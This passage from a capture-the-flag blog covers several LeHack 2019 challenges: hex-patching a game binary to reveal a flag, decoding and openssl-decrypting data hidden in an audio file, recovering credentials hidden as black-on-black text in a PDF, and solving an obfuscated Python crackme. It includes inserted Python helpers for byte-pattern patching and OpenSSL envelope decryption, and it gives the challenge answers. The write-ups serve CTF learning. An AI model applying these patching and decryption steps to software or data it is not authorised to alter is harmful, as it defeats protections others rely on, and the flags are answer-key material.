<div class="highlight"><pre><span></span><code><span class="n">P_0</span> <span class="o">*</span><span class="kr">__cdecl</span> <span class="nf">b</span><span class="p">(</span><span class="n">P_0</span> <span class="o">*</span><span class="n">retstr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">string_0</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// ax</span>
<span class="n">byte</span> <span class="o">*</span><span class="n">v2</span><span class="p">;</span> <span class="c1">// r12</span>
<span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// r13</span>
<span class="n">string_0</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// ax</span>
<span class="n">v1</span> <span class="o">=</span> <span class="n">tos2</span><span class="p">(</span><span class="s">"a"</span><span class="p">);</span>
<span class="n">v2</span> <span class="o">=</span> <span class="n">v1</span><span class="p">.</span><span class="n">str</span><span class="p">;</span>
<span class="n">v3</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">v1</span><span class="p">.</span><span class="n">len</span><span class="p">;</span>
<span class="n">v4</span> <span class="o">=</span> <span class="n">tos2</span><span class="p">(</span><span class="o">&</span><span class="n">byte_A01E</span><span class="p">);</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">l</span> <span class="o">=</span> <span class="mi">100</span><span class="p">;</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">s</span> <span class="o">=</span> <span class="mi">20</span><span class="p">;</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">sh</span> <span class="o">=</span> <span class="mi">5</span><span class="p">;</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">st</span> <span class="o">=</span> <span class="mi">10</span><span class="p">;</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">a</span><span class="p">.</span><span class="n">str</span> <span class="o">=</span> <span class="n">v2</span><span class="p">;</span>
<span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">retstr</span><span class="o">-></span><span class="n">a</span><span class="p">.</span><span class="n">len</span> <span class="o">=</span> <span class="n">v3</span><span class="p">;</span>
<span class="n">retstr</span><span class="o">-></span><span class="n">la</span><span class="p">.</span><span class="n">str</span> <span class="o">=</span> <span class="n">v4</span><span class="p">.</span><span class="n">str</span><span class="p">;</span>
<span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">retstr</span><span class="o">-></span><span class="n">la</span><span class="p">.</span><span class="n">len</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">v4</span><span class="p">.</span><span class="n">len</span><span class="p">;</span>
<span class="k">return</span> <span class="n">retstr</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>We then change one value, for example the attack, to validate this hypothesis:</p>
<p><img alt="glad_attack_hex" src="https://blog.nlegall.fr/images/glad_attack_hex.png"></p>
<p><img alt="glad_attack_hex_new" src="https://blog.nlegall.fr/images/glad_attack_hex_new.png"></p>
<p>We apply the patch and run our binary again:</p>
<div class="highlight"><pre><span></span><code>Welcome Gladiator !
Please select a character :
1 - Berserker (attack : 20, shield: 5)
2 - Guardian (attack: 10, shield: 10)
1
VS Berserker
Select action in the range 0..3 :
Attack = 0
Protect = 1
Heal = 2
Pass = 3
0
Turn 1 :
User Action : attack
Bot Action : heal
User: Life : 100, Stamina: 9
Bot Life : -120, Stamina: 9
You Win !
</code></pre></div>
<p>Perfect, we have found the code for the <code>Berserker</code>. However, we still do not know how to unlock the flag. We therefore keep going through the functions and reach the function <code>d</code>:</p>
<div class="highlight"><pre><span></span><code> <span class="k">if</span> <span class="p">(</span> <span class="n">p</span><span class="p">.</span><span class="n">l</span> <span class="o">==</span> <span class="mi">42</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">c_array</span> <span class="o">=</span> <span class="mi">4330</span><span class="p">;</span>
<span class="n">v6</span> <span class="o">=</span> <span class="mi">934</span><span class="p">;</span>
<span class="n">v7</span> <span class="o">=</span> <span class="mi">2330</span><span class="p">;</span>
<span class="n">v8</span> <span class="o">=</span> <span class="mi">1502</span><span class="p">;</span>
<span class="n">v9</span> <span class="o">=</span> <span class="mi">4506</span><span class="p">;</span>
<span class="n">v10</span> <span class="o">=</span> <span class="mi">7604</span><span class="p">;</span>
<span class="n">v11</span> <span class="o">=</span> <span class="mi">2746</span><span class="p">;</span>
<span class="n">v12</span> <span class="o">=</span> <span class="mi">6248</span><span class="p">;</span>
<span class="n">v13</span> <span class="o">=</span> <span class="mi">3353</span><span class="p">;</span>
<span class="n">v14</span> <span class="o">=</span> <span class="mi">4068</span><span class="p">;</span>
<span class="n">v15</span> <span class="o">=</span> <span class="mi">968</span><span class="p">;</span>
<span class="n">v16</span> <span class="o">=</span> <span class="mi">5295</span><span class="p">;</span>
<span class="n">v17</span> <span class="o">=</span> <span class="mi">1207</span><span class="p">;</span>
<span class="n">v18</span> <span class="o">=</span> <span class="mi">4878</span><span class="p">;</span>
<span class="n">v19</span> <span class="o">=</span> <span class="mi">2696</span><span class="p">;</span>
<span class="n">v20</span> <span class="o">=</span> <span class="mi">7067</span><span class="p">;</span>
<span class="n">v21</span> <span class="o">=</span> <span class="mi">2954</span><span class="p">;</span>
<span class="n">v22</span> <span class="o">=</span> <span class="mi">6149</span><span class="p">;</span>
<span class="n">v23</span> <span class="o">=</span> <span class="mi">3199</span><span class="p">;</span>
<span class="n">new_array_from_c_array</span><span class="p">(</span><span class="o">&</span><span class="n">tmp3</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="o">&</span><span class="n">c_array</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">tmp4</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">tmp3</span><span class="p">.</span><span class="n">len</span> <span class="o">></span> <span class="n">tmp4</span><span class="p">;</span> <span class="o">++</span><span class="n">tmp4</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">i</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">tmp3</span><span class="p">.</span><span class="n">data</span> <span class="o">+</span> <span class="n">tmp4</span><span class="p">);</span>
<span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">v1</span><span class="p">.</span><span class="n">element_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">main</span><span class="p">.</span><span class="n">element_size</span><span class="p">;</span>
<span class="o">*</span><span class="p">(</span><span class="n">_OWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">v1</span><span class="p">.</span><span class="n">data</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_OWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">main</span><span class="p">.</span><span class="n">data</span><span class="p">;</span>
<span class="n">j</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">array__get</span><span class="p">(</span><span class="n">v1</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
<span class="n">v2</span> <span class="o">=</span> <span class="n">char_str</span><span class="p">(</span><span class="n">j</span><span class="p">);</span>
<span class="n">v27</span><span class="p">.</span><span class="n">str</span> <span class="o">=</span> <span class="n">v2</span><span class="p">.</span><span class="n">str</span><span class="p">;</span>
<span class="n">v27</span><span class="p">.</span><span class="n">len</span> <span class="o">=</span> <span class="n">v2</span><span class="p">.</span><span class="n">len</span><span class="p">;</span>
<span class="n">v_print</span><span class="p">(</span><span class="n">v27</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">v3</span> <span class="o">=</span> <span class="n">tos2</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">v28</span><span class="p">.</span><span class="n">str</span> <span class="o">=</span> <span class="n">v3</span><span class="p">.</span><span class="n">str</span><span class="p">;</span>
<span class="n">v28</span><span class="p">.</span><span class="n">len</span> <span class="o">=</span> <span class="n">v3</span><span class="p">.</span><span class="n">len</span><span class="p">;</span>
<span class="n">v_print</span><span class="p">(</span><span class="n">v28</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>We see that a test guards the body of the function. As seen in the <code>Berserker</code> function, <code>p.l</code> is the player's life. The body then builds an array of 19 indices and, for each one, prints the character found at that index in another array (<code>main</code> in the decompiler's naming): the 19-character flag is assembled at run time, which is why it does not show up as a plain string in the binary. So we go back and edit the default life (<code>100</code>) to the <code>42</code> this function tests for.</p>
<p><img alt="glad_life_hex_new" src="https://blog.nlegall.fr/images/glad_life_hex_new.png"></p>
<p>We apply our new patch and run the binary once more:</p>
<div class="highlight"><pre><span></span><code><span class="err">Welcome Gladiator !</span>
<span class="err">Please select a character :</span>
<span class="err"> 1 - Berserker (attack : 20, shield: 5)</span>
<span class="err"> 2 - Guardian (attack: 10, shield: 10)</span>
<span class="err">1</span>
<span class="err">VS Guard</span>
<span class="err">Select action in the range 0..3 :</span>
<span class="err"> Attack = 0</span>
<span class="err"> Protect = 1</span>
<span class="err"> Heal = 2</span>
<span class="err"> Pass = 3</span>
<span class="err">0</span>
<span class="err">Turn 1 :</span>
<span class="err"> User Action : attack</span>
<span class="err"> Bot Action : heal</span>
<span class="err"> User: Life : 42, Stamina: 9</span>
<span class="err"> Bot Life : -115, Stamina: 9</span>
<span class="err">You Win !</span>
<span class="err">LH{lUj?]T_VAR94$+N}</span>
</code></pre></div>
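<p>The hex-editor patch above can be made repeatable. The following is an added example, not code from the original write-up: a small Python patcher that locates a byte pattern, insists that it occurs exactly once (so a stray <code>100</code> elsewhere in the binary is never overwritten by mistake), and swaps in a same-length replacement. The instruction encoding it uses for the sample, <code>mov dword ptr [rdi+disp8], imm32</code> as <code>C7 07</code> / <code>C7 47 disp8</code> followed by the little-endian immediate, and the field offsets 0, 4, 8 and 12 are assumptions; the Gladiator binary's actual bytes are not reproduced on the page, so <code>SAMPLE_CODE</code> is a constructed stand-in.</p>

```python
"""Patch an immediate operand in a binary by byte pattern, refusing ambiguous matches.

Added example, not code from the original write-up. The write-up patched the
Gladiator binary by hand in a hex editor; this is the same edit as a script,
with the check a hex editor does not give you: the pattern must occur exactly
once, and the replacement must have the same length so no code moves. The
instruction encoding is an assumption (x86-64 `mov dword ptr [rdi+disp8], imm32`,
opcode C7 with ModRM 07 or 47); the real binary's bytes are not on the page.
"""
import struct
from pathlib import Path


def encode_store(disp: int, value: int) -> bytes:
    """Assumed encoding of `mov dword ptr [rdi+disp], value` (C7 07 imm32 or C7 47 disp8 imm32)."""
    if not 0 <= disp < 128:
        raise ValueError("only 8-bit displacements are handled here")
    modrm = b"\x07" if disp == 0 else b"\x47" + bytes([disp])
    return b"\xc7" + modrm + struct.pack("<i", value)


def find_unique(data: bytes, needle: bytes) -> int:
    """Offset of `needle` in `data`; raises if it is absent or occurs more than once."""
    first = data.find(needle)
    if first < 0:
        raise ValueError("pattern not found")
    if data.find(needle, first + 1) >= 0:
        raise ValueError("pattern is not unique; include more context bytes")
    return first


def patch_bytes(data: bytes, old: bytes, new: bytes) -> bytes:
    """Replace the single occurrence of `old` with `new`, keeping every other byte."""
    if len(old) != len(new):
        raise ValueError("replacement must have the same length as the pattern")
    off = find_unique(data, old)
    return data[:off] + new + data[off + len(old):]


def patch_file(path: str, old: bytes, new: bytes) -> int:
    """Patch a file in place, keeping a .bak copy; returns the patched offset."""
    p = Path(path)
    data = p.read_bytes()
    off = find_unique(data, old)
    p.with_suffix(p.suffix + ".bak").write_bytes(data)
    p.write_bytes(patch_bytes(data, old, new))
    return off


# Constructed stand-in for the Berserker constructor seen in the decompiler:
# the four stores (life 100, attack 20, shield 5, stamina 10) at assumed
# offsets 0, 4, 8 and 12, wrapped in a little unrelated code. Not the real binary.
SAMPLE_CODE = (
    b"\x55\x48\x89\xe5"          # push rbp; mov rbp, rsp
    + encode_store(0, 100)       # retstr->l  = 100
    + encode_store(4, 20)        # retstr->s  = 20
    + encode_store(8, 5)         # retstr->sh = 5
    + encode_store(12, 10)       # retstr->st = 10
    + b"\x5d\xc3"                # pop rbp; ret
)

# The same edit the write-up made: life 100 -> 42 so the check in `d` passes.
PATCHED_CODE = patch_bytes(SAMPLE_CODE, encode_store(0, 100), encode_store(0, 42))

if __name__ == "__main__":
    off = find_unique(SAMPLE_CODE, encode_store(0, 100))
    print(f"life store at offset {off:#x}: "
          f"{SAMPLE_CODE[off:off + 6].hex()} -> {PATCHED_CODE[off:off + 6].hex()}")
```

<p>Against the real file, once the bytes of the store have been confirmed in the disassembly, the call is <code>patch_file("gladiator", encode_store(0, 100), encode_store(0, 42))</code>. If <code>find_unique</code> reports that the pattern is not unique, extend it with the neighbouring store (attack = 20) so the match is anchored to this constructor rather than to any other <code>100</code> in the binary.</p>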
<p>YEAH! The flag appears once the opponent is dead: <code>LH{lUj?]T_VAR94$+N}</code>.</p>LeHack 19 - HackHackLeHack2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-hackhacklehack.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/HackHackLeHack.flac">HackHackLeHack.flac</a></em></p>
<div class="highlight"><pre><span></span><code>HackHackLeHack
200 Points - Hard
HackHackLeHack
Url: https://static.wargame.rocks/HackHackLeHack.flac
</code></pre></div>
<p>To make processing easier, we start by converting it to mp3 (MP3 is lossy; if a later step needs accurate spectral analysis, work on the FLAC or a WAV export instead).</p>
<p>Listening to it, we notice that the sound differs between the left and right channels.</p>
<h2>Left</h2>
<p>We split the two channels and start by listening to the left one: <a href="https://blog.nlegall.fr/files/lehack/19/FLAG Gauche only.mp3">Left</a>.</p>
<p><img alt="Transform1" src="https://blog.nlegall.fr/images/Transform1.png"></p>
<p>We then transcribe the <code>0</code>s and <code>1</code>s spoken in the audio track. We get:</p>
<div class="highlight"><pre><span></span><code>0010111101101000001100110100110001001100001100000101111101100011001100010101000001101000001100110101001000100101
</code></pre></div>
<p>It decodes easily from the terminal with <code>perl</code>:</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"0010111101101000001100110100110001001100001100000101111101100011001100010101000001101000001100110101001000100101"</span> <span class="p">|</span> perl -lpe <span class="s1">'$_=pack"B*",$_'</span>
/h3LL0_c1Ph3R%
</code></pre></div>
<p>We have a first string, but it is not the flag :(. So we move on to the right track.</p>
<h2>Right</h2>
<p>Raw, it sounds like this: <a href="https://blog.nlegall.fr/files/lehack/19/FLAG Droite only.mp3">Right</a>.</p>
<p>We notice that two words repeat throughout the track: <code>le</code> and <code>hack</code>. We can therefore assume they encode binary:</p>
<ul>
<li><code>le</code> for <code>0</code></li>
<li><code>hack</code> for <code>1</code></li>
</ul>
<p>The pace is too fast to follow, so we slow the track down: <a href="https://blog.nlegall.fr/files/lehack/19/FLAG Droite only slow.mp3">Right, slowed</a>. Stray frequencies appear, so we also filter them out and isolate the frequencies of the two words we care about: <a href="https://blog.nlegall.fr/files/lehack/19/FLAG Droite only slow + EQ.mp3">Right, slowed and equalised</a>.</p>
<p>The result is much easier to follow. Still, given the length of the track, cutting it into one segment per byte makes it easier to separate and verify the transcribed bits: <a href="https://blog.nlegall.fr/files/lehack/19/FLAG Droite only slow + EQ + cut.mp3">Right, slowed, equalised and cut</a>. The resulting track lasts 8:55.</p>
<p><img alt="Transform2" src="https://blog.nlegall.fr/images/Transform2.png"></p>
<p>After many listens and checks, we end up with the binary string below, which we decode as before:</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"01010011011000010110110001110100011001010110010001011111010111111110011011110110110100010111100101111101010110001000001110001110110101111000110111110010010010100000010000010000100101001100001111111110011111011101101111100110000000101110000010100010101011101000001101100010111001000000011110111101110001111001111100010110000010011011101010001011100010000110010111011110100110000011011101001100011011101000101110001000011011001000000100011001111100000100110011110001100100100100111011110101001010111100000110011001"</span><span class="p">|</span> perl -lpe <span class="s1">'$_=pack"B*",$_'</span>
Salted__���y<span class="o">}</span>X���J���<span class="o">}</span>��ࢮ�b��ǟ ���eޘ7Ln��l��L�N�+��
</code></pre></div>
<p>A search on the start of the decoded bytes identifies the envelope that <code>openssl enc</code> writes when a password is used: the 8-byte magic <code>Salted__</code>, then an 8-byte salt (here <code>e6 f6 d1 79 7d 58 83 8e</code>), then the ciphertext (48 bytes, three AES blocks). The salt is therefore already in the data; what is missing is the password, and the left-channel string is the obvious candidate.</p>
<p>We therefore decrypt with <code>openssl</code>, passing that string as the password with <code>-k</code>. One caveat: key and IV are derived from password and salt with a digest whose default changed in OpenSSL 1.1.0 (MD5 before, SHA-256 since), so if the command prints <code>bad decrypt</code>, retry with an explicit <code>-md md5</code> or <code>-md sha256</code>:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># errors are sent to /dev/null so that only the flag is displayed</span>
$ <span class="nb">echo</span> <span class="s2">"01010011011000010110110001110100011001010110010001011111010111111110011011110110110100010111100101111101010110001000001110001110110101111000110111110010010010100000010000010000100101001100001111111110011111011101101111100110000000101110000010100010101011101000001101100010111001000000011110111101110001111001111100010110000010011011101010001011100010000110010111011110100110000011011101001100011011101000101110001000011011001000000100011001111100000100110011110001100100100100111011110101001010111100000110011001"</span><span class="p">|</span> perl -lpe <span class="s1">'$_=pack"B*",$_'</span><span class="p">|</span> openssl aes-256-cbc -salt -d -k <span class="s2">"/h3LL0_c1Ph3R%"</span> <span class="m">2</span>>/dev/null
flag: lh_1bd534f7046f509e2921a2dce3455a35
</code></pre></div>
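<p>As an added example, not code from the original write-up, here is the same pipeline in Python with the part <code>openssl</code> hides made explicit: the <code>Salted__</code> envelope is split into salt and ciphertext, and the legacy EVP_BytesToKey derivation is implemented for both digests OpenSSL has used as default, so a <code>bad decrypt</code> can be traced to the wrong digest rather than to the wrong password. The bit string and the password are the ones found above; the <code>cryptography</code> package is assumed to be installed for the AES step only, the parsing and key derivation need nothing beyond the standard library.</p>

```python
"""Parse and decrypt the OpenSSL `enc` envelope recovered from the right channel.

Added example, not code from the original write-up. `openssl enc -k` writes
the 8-byte magic "Salted__", an 8-byte random salt and then the AES-CBC
ciphertext, and derives key and IV from password and salt with the legacy
EVP_BytesToKey routine (one digest iteration). That routine is re-implemented
here so the digest choice is explicit: OpenSSL before 1.1.0 used MD5, 1.1.0
and later default to SHA-256, and the wrong one yields "bad decrypt". The bit
string is the one transcribed in the write-up, the password is the left-channel
string; AES comes from the `cryptography` package (assumed installed).
"""
import hashlib

# Right channel as transcribed above: 512 bits = 64 bytes.
RIGHT_CHANNEL_BITS = (
    "0101001101100001011011000111010001100101011001000101111101011111"
    "1110011011110110110100010111100101111101010110001000001110001110"
    "1101011110001101111100100100101000000100000100001001010011000011"
    "1111111001111101110110111110011000000010111000001010001010101110"
    "1000001101100010111001000000011110111101110001111001111100010110"
    "0000100110111010100010111000100001100101110111101001100000110111"
    "0100110001101110100010111000100001101100100000010001100111110000"
    "0100110011110001100100100100111011110101001010111100000110011001"
)
PASSWORD = b"/h3LL0_c1Ph3R%"   # the left-channel string


def bits_to_bytes(bits: str) -> bytes:
    """Pack a string of '0'/'1' into bytes, MSB first, like perl's pack "B*"."""
    if len(bits) % 8:
        raise ValueError(f"{len(bits)} bits is not a whole number of bytes")
    return int(bits, 2).to_bytes(len(bits) // 8, "big")


def parse_salted_envelope(blob: bytes):
    """Split an `openssl enc` blob into (salt, ciphertext)."""
    if blob[:8] != b"Salted__":
        raise ValueError("not an OpenSSL salted envelope")
    salt, ciphertext = blob[8:16], blob[16:]
    if not ciphertext or len(ciphertext) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    return salt, ciphertext


def evp_bytes_to_key(password: bytes, salt: bytes, key_len=32, iv_len=16, md="md5", count=1):
    """Legacy OpenSSL KDF: D_i = H^count(D_{i-1} || password || salt), concatenated."""
    out, prev = b"", b""
    while len(out) < key_len + iv_len:
        d = prev + password + salt
        for _ in range(count):
            d = hashlib.new(md, d).digest()
        out += d
        prev = d
    return out[:key_len], out[key_len:key_len + iv_len]


def decrypt_openssl_enc(blob: bytes, password: bytes, md="md5") -> bytes:
    """AES-256-CBC decryption of the envelope with the given KDF digest; checks PKCS#7 padding."""
    salt, ciphertext = parse_salted_envelope(blob)
    key, iv = evp_bytes_to_key(password, salt, md=md)
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError as exc:   # assumption: `pip install cryptography`
        raise RuntimeError("the cryptography package is needed for the AES step") from exc
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError(f"bad padding with {md}: wrong password or wrong KDF digest")
    return padded[:-pad]


if __name__ == "__main__":
    blob = bits_to_bytes(RIGHT_CHANNEL_BITS)
    salt, ciphertext = parse_salted_envelope(blob)
    print(f"salt={salt.hex()} ciphertext={len(ciphertext)} bytes")
    for md in ("md5", "sha256"):   # try both defaults, as one would with `openssl -md`
        try:
            print(md, decrypt_openssl_enc(blob, PASSWORD, md=md))
            break
        except ValueError as exc:
            print(md, exc)
```

<p>The padding check is what turns a silent failure into a diagnosis: with the wrong digest the key is wrong, CBC still "decrypts", and the last byte is almost never a valid PKCS#7 pad, which is the condition behind the <code>bad decrypt</code> that <code>2>/dev/null</code> in the command above would swallow.</p>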
<p>So we have our flag :D.</p>LeHack 19 - infiltrez la mafia!2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-infiltrez-la-mafia.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/Mafia_cybersecrète.pdf">Mafia_cybersecrète.pdf</a></em></p>
<div class="highlight"><pre><span></span><code>infiltrez la mafia!
5 Points
You are part of a group of hackers trying to dismantle a group called "Mafia cybersecrète". Letting them do as they please is out of the question! Among the documents you managed to recover about this group, you have the attached document. Can you find the user's password?
Url: https://static.wargame.rocks/Mafia_cybersecrète.pdf
</code></pre></div>
<p>The PDF contains a passage written in black on a black background (which only hides it visually; the text is still in the page's content stream). Simply double-clicking the "erased" areas lets us copy and paste the challenge's username and password (<code>pdftotext</code> would recover them just as well):</p>
<div class="highlight"><pre><span></span><code><span class="err">JMenin87</span>
<span class="err">CyberSecretJMenin</span>
</code></pre></div>LeHack 19 - my first crackme2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-my-first-crackme.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/checkme.py">checkme.py</a></em></p>
<div class="highlight"><pre><span></span><code>my first crackme
5 Points
You must find the password that validates the Python script!
Url: https://static.wargame.rocks/checkme.py
</code></pre></div>
<p>We have a single file, a Python script. We open it in our favourite text editor (vim forever <3):</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s1">'repuS'</span><span class="p">[::(</span><span class="o">-</span><span class="mi">1</span> <span class="o">*</span> <span class="mi">88</span> <span class="o">+</span> <span class="mi">87</span> <span class="o">*</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">183</span> <span class="o">+</span> <span class="mi">80</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">125</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)]</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">161</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">*</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">140</span> <span class="o">+</span> <span class="mi">76</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">72</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="o">-</span><span class="mi">26</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">53</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">5</span> <span class="o">*</span> <span class="mi">44</span> <span class="o">+</span> <span class="mi">26</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">141</span> <span class="o">+</span> <span class="mi">101</span><span class="p">)</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">153</span> <span class="o">+</span> <span class="mi">14</span> <span class="o">*</span> <span 
class="mi">0</span> <span class="o">*</span> <span class="mi">152</span> <span class="o">+</span> <span class="mi">4</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">*</span> <span class="mi">94</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="s1">'FfdkCtfr'</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'f'</span><span class="p">,</span><span class="s1">'e'</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="mi">4</span> <span class="o">*</span> <span class="mi">26</span> <span class="o">+</span> <span class="mi">3</span><span class="p">),</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">142</span> <span class="o">+</span> <span class="mi">111</span><span class="p">))</span> <span class="o">+</span> <span class="s1">'fzfqfQorTheWinjkildzodzp'</span><span class="p">[</span><span class="mi">6</span><span class="p">:</span><span class="mi">14</span><span class="p">]</span>
<span class="n">pass1</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s1">' :essap ed tom ertov rertne zelliuev'</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
<span class="k">if</span> <span class="n">pass1</span> <span class="o">==</span> <span class="n">flag</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Bien joue, tu as trouve le flag!'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">print</span> <span class="p">(</span><span class="s1">'Loupe... essaye encore!'</span><span class="p">)</span>
</code></pre></div>
<p>We see that the flag is built by a series of operations on characters. The simplest approach is to add a <code>print(flag)</code> right after it is defined and drop the check. For example:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s1">'repuS'</span><span class="p">[::(</span><span class="o">-</span><span class="mi">1</span> <span class="o">*</span> <span class="mi">88</span> <span class="o">+</span> <span class="mi">87</span> <span class="o">*</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">183</span> <span class="o">+</span> <span class="mi">80</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">125</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)]</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">161</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">*</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">140</span> <span class="o">+</span> <span class="mi">76</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">72</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="o">-</span><span class="mi">26</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">53</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">5</span> <span class="o">*</span> <span class="mi">44</span> <span class="o">+</span> <span class="mi">26</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">141</span> <span class="o">+</span> <span class="mi">101</span><span class="p">)</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">153</span> <span class="o">+</span> <span class="mi">14</span> <span class="o">*</span> <span 
class="mi">0</span> <span class="o">*</span> <span class="mi">152</span> <span class="o">+</span> <span class="mi">4</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">*</span> <span class="mi">94</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="s1">'FfdkCtfr'</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'f'</span><span class="p">,</span><span class="s1">'e'</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="mi">4</span> <span class="o">*</span> <span class="mi">26</span> <span class="o">+</span> <span class="mi">3</span><span class="p">),</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">142</span> <span class="o">+</span> <span class="mi">111</span><span class="p">))</span> <span class="o">+</span> <span class="s1">'fzfqfQorTheWinjkildzodzp'</span><span class="p">[</span><span class="mi">6</span><span class="p">:</span><span class="mi">14</span><span class="p">]</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</code></pre></div>
